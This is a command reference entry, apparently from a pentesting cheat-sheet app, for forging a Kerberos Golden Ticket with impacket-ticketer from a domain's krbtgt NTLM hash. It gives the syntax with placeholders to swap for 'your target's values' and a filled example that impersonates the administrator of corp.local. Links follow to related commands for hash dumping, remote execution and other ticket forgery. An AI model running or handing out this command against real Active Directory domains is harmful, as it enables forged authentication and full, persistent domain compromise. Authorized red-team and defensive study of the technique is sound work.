Impacket Golden Ticket
Forge a Golden Ticket (TGT) using the krbtgt NTLM hash
- Tool
- impacket-ticketer
- Category
- Credential Attacks / Ticket Forgery & Conversion
- Platform
- linux
- Requires
- NTLM hash
- Protocols
- KERBEROS
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-ticketer -nthash '<hash>' -domain-sid '<domain_sid>' -domain '<domain>' -spn 'krbtgt/<domain>' '<user>'
Examples
impacket-ticketer -nthash 'aad3b435b51404eeaad3b435b51404ee' -domain-sid 'S-1-5-21-1234567890-1234567890-1234567890' -domain 'corp.local' -spn 'krbtgt/corp.local' 'administrator'
Tags
Related commands
- Impacket PSExec Execute commands via PSExec service
- Impacket Secrets Dump Dump hashes from remote Windows system (SAM, LSA, NTDS)
- Impacket describeTicket Parse and display the contents of a Kerberos ticket (.ccache or .kirbi)
- Impacket Diamond Ticket Forge a Diamond Ticket: request a legitimate TGT from the KDC and then patch its PAC…
- Impacket getPac Retrieve the PAC (Privilege Attribute Certificate) for a target user via the S4U2self…
- Impacket Silver Ticket Forge a Silver Ticket (TGS) for a specific service using its NTLM hash
- Impacket Ticket Converter Convert Kerberos tickets between kirbi (Windows) and ccache (Linux) formats
- Impacket ticketer.py Golden Ticket Forge a Golden Ticket (TGT signed with the krbtgt key) granting any user, any privilege,…